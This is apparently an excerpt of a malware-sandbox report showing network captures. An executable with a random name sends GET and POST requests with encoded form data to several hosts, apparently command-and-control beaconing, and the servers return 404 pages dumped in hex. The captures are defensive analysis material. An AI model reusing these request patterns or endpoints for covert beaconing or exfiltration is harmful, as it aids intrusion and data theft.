                                Data Ascii: jTZPp=ccxtBLnFjmJeLuWaeOIR3I1CFTmsUHlXKRPse0O5AmRmAcGaHJZvaifWFeOc9cs3JP1eilrssa7weO0oCFSCtVoLkT3CIgafL1zd5uqOiuMBgtpmyFNgsL88cS1gmyxkK4nl9jUa+WFlsu9LOB/WBfSzhiGoNbwSt3kJIN542Vmgfo159yg6QbTse+rFld44Jcg5zMHtQzfGByLEA59gPnAUPrRTzK3Uudhsiy3eXc8RhwN0ILBkfnRrogjRPWydZP67voH/GtHioEBIfp3ng07UTuHyggEvULmSpGAhyVsSJnY0hML9CajKd560wXPjY7cLmQt08Tt1A0Zjs1B+v/lOZ4oQ1pJ6PO91+LTBHxQ1nJyA4gCMFhcc0xQKXc65aRzeWhmOUFbRQ3t5PrY+d6w07LzCrQ9t1m7x+3XlD6D6LQ8p2vb233HbJ5L+9xDScxu9U7LfiZFmKu19aUPW5FLhn/yxzJVXAjmUCW5ytfTL0+wzsBEh/V5R5eaTQOXZADgidVfTEVWnr+sqQiLZh4t3k9wAthRSMmcfeAKkrhdl3vlELRqayvnHvBsLLAqlmPfRmXHjvhcKwRM/kWtmfHlRgL9NytgFIhPWk4Xc3s+z7NHrOHY/5yT5nQfWxF1uOfPbpolcKbmuXMvIBpWP6rNXLAkWHtoQcvxZMqdqayqoXceoPXfSYavXSPbGuFc68gB875Z47Y2iGwo+vLhq4h6S+mHdA+FtldDIUKaZO5XoL1StgiSJ5Qe8ELoQsf5qZg0+5KLJYQ901nKcZOtL7BMDoUQIaqKF42+WXcnMsNjWpPAmpJUhRCZyDOthrggUKe8fHBRuUWnkqSN6GILniusf+QXG0PIaztDM3UNWZOSpFgZemkiLBDawB3y527zuevhCA9VySSk/POvjLU16lb+038BOUe/UQXZJzi9oq5tgDIel6+Y4zwnhhEj14SG32cFA5tPvGZBDl+rBs+lQqie7EdMi61bX0P3v7pSMDBCkN/ [TRUNCATED]
                                May 28, 2024 07:17:26.075145006 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:25 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                May 28, 2024 07:17:26.075167894 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                                May 28, 2024 07:17:26.075180054 CEST448INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                                Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                                May 28, 2024 07:17:26.075191975 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 35 36 2e 39 22 20 63 79 3d 22 38 30 35 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="440.5" cy="813.7" r="3.7" transform="translate(-322.5 290.2) rotate(-27.1
                                May 28, 2024 07:17:26.075206041 CEST1236INData Raw: 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 36 2e 38 22 20 63 79 3d 22 38 30 35 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 38 20 33 33 33 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37
                                Data Ascii: <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.7" r="3.7" transform="translate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029"/> <c
                                May 28, 2024 07:17:26.075253963 CEST448INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 31 2e 37 20 33 35 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                Data Ascii: ="3.7" transform="translate(-291.7 354.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="608.2" cy="784.4" r="3.7" transform="translate(-290.7 363.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="612.4" cy="765.8" r=
                                May 28, 2024 07:17:26.075264931 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65
                                Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
                                May 28, 2024 07:17:26.075278997 CEST1236INData Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                                Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
                                May 28, 2024 07:17:26.075290918 CEST448INData Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34
                                Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
                                May 28, 2024 07:17:26.075366020 CEST1236INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
                                May 28, 2024 07:17:26.080516100 CEST1236INData Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d
                                Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.649744203.161.43.227801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:28.022160053 CEST476OUTGET /05xu/?jTZPp=ReZNC8TX9gJaOIK/BvITh+0FGwzFHm92bQvbNg62F2J0R8z5SuhCGDe2HN2Byu0BC7BKvHjRxIjSR8MFICml92wEl2DsCCajGT/6l7iIm8MBifF7wDoE5bE7ZGx4kkh6K6rbsW4=&5L0=2bCPy0 HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:28.626703978 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:28 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                May 28, 2024 07:17:28.626719952 CEST224INData Raw: 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38
                                Data Ascii: 98.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="
                                May 28, 2024 07:17:28.626732111 CEST1236INData Raw: 74 72 61 6e 73 6c 61 74 65 28 2d 33 33 35 2e 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78
                                Data Ascii: translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="483" cy="849.2" r="3.7" transform="trans
                                May 28, 2024 07:17:28.626744986 CEST1236INData Raw: 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 39 2e 38 22 20 63 79 3d 22 37 39 31 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72
                                Data Ascii: )" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)
                                May 28, 2024 07:17:28.626754999 CEST1236INData Raw: 69 72 63 6c 65 20 63 78 3d 22 35 31 39 2e 37 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 33 2e 34 20 33 32 36 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e
                                Data Ascii: ircle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <ci
                                May 28, 2024 07:17:28.626766920 CEST672INData Raw: 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09
                                Data Ascii: "3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.
                                May 28, 2024 07:17:28.627649069 CEST1236INData Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e
                                Data Ascii: fe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/
                                May 28, 2024 07:17:28.627688885 CEST1236INData Raw: 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23
                                Data Ascii: y="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy
                                May 28, 2024 07:17:28.627701998 CEST448INData Raw: 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                                Data Ascii: ranslate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="tr
                                May 28, 2024 07:17:28.627712011 CEST1236INData Raw: 34 22 20 63 79 3d 22 36 39 31 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c
                                Data Ascii: 4" cy="691.3" r="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8
                                May 28, 2024 07:17:28.631905079 CEST1236INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65
                                Data Ascii: sform="translate(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.649745185.229.21.229801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:33.834487915 CEST752OUTPOST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 66 61 59 66 2b 4a 77 69 77 31 7a 79 4c 47 68 59 32 72 32 53 39 62 2f 52 66 4c 6f 72 7a 65 33 6c 2b 42 6c 77 5a 53 41 2f 4a 33 4f 43 74 4e 32 53 47 74 50 52 43 4b 7a 30 4d 31 6e 7a 54 2b 6d 66 52 63 6d 4e 62 74 66 74 58 5a 41 56 69 62 58 4f 6f 6e 68 4f 79 72 55 79 4f 30 59 43 41 67 70 4a 64 56 59 71 63 74 76 35 50 75 75 58 33 48 62 32 79 36 47 65 36 4a 76 39 76 76 6f 38 31 68 52 70 39 74 33 56 47 6d 79 47 58 55 75 59 76 59 78 32 69 77 33 67 64 6f 79 41 53 76 70 36 54 78 6d 59 54 77 55 64 44 68 52 37 7a 31 36 4b 7a 54 48 75 6e 61 4e 2b 72 6a 39 64 34 32 47 57 6d 75 48 59 50 57 65 54 56 72 59 6b 42 72 56 46
                                Data Ascii: jTZPp=faYf+Jwiw1zyLGhY2r2S9b/RfLorze3l+BlwZSA/J3OCtN2SGtPRCKz0M1nzT+mfRcmNbtftXZAVibXOonhOyrUyO0YCAgpJdVYqctv5PuuX3Hb2y6Ge6Jv9vvo81hRp9t3VGmyGXUuYvYx2iw3gdoyASvp6TxmYTwUdDhR7z16KzTHunaN+rj9d42GWmuHYPWeTVrYkBrVF
                                May 28, 2024 07:17:34.453079939 CEST479INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:34 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.649746185.229.21.229801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:36.363867044 CEST776OUTPOST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 66 61 59 66 2b 4a 77 69 77 31 7a 79 45 48 52 59 6c 59 4f 53 71 4c 2f 53 56 72 6f 72 6c 75 33 68 2b 42 70 77 5a 54 56 30 4a 6c 71 43 74 70 36 53 55 6f 37 52 46 4b 7a 30 55 46 6e 32 65 65 6d 71 52 63 72 2b 62 73 6a 74 58 5a 38 56 69 65 37 4f 6f 55 4a 4a 39 62 55 77 53 30 59 41 4e 41 70 4a 64 56 59 71 63 74 4c 44 50 75 47 58 33 30 44 32 7a 62 47 42 6b 35 76 38 6f 76 6f 38 78 68 51 69 39 74 33 7a 47 6e 65 6f 58 52 71 59 76 5a 74 32 69 68 33 6a 55 6f 79 47 50 2f 6f 6d 54 43 44 42 4c 51 70 53 43 6d 39 4d 79 30 75 72 79 6c 47 30 37 70 4e 64 35 7a 64 66 34 30 65 6b 6d 4f 48 79 4e 57 6d 54 48 38 55 44 4f 66 77 6d 30 78 35 38 42 76 48 67 76 6b 76 48 39 67 36 73 76 53 57 6b 32 77 3d 3d
                                Data Ascii: jTZPp=faYf+Jwiw1zyEHRYlYOSqL/SVrorlu3h+BpwZTV0JlqCtp6SUo7RFKz0UFn2eemqRcr+bsjtXZ8Vie7OoUJJ9bUwS0YANApJdVYqctLDPuGX30D2zbGBk5v8ovo8xhQi9t3zGneoXRqYvZt2ih3jUoyGP/omTCDBLQpSCm9My0urylG07pNd5zdf40ekmOHyNWmTH8UDOfwm0x58BvHgvkvH9g6svSWk2w==
                                May 28, 2024 07:17:36.974198103 CEST479INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:36 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
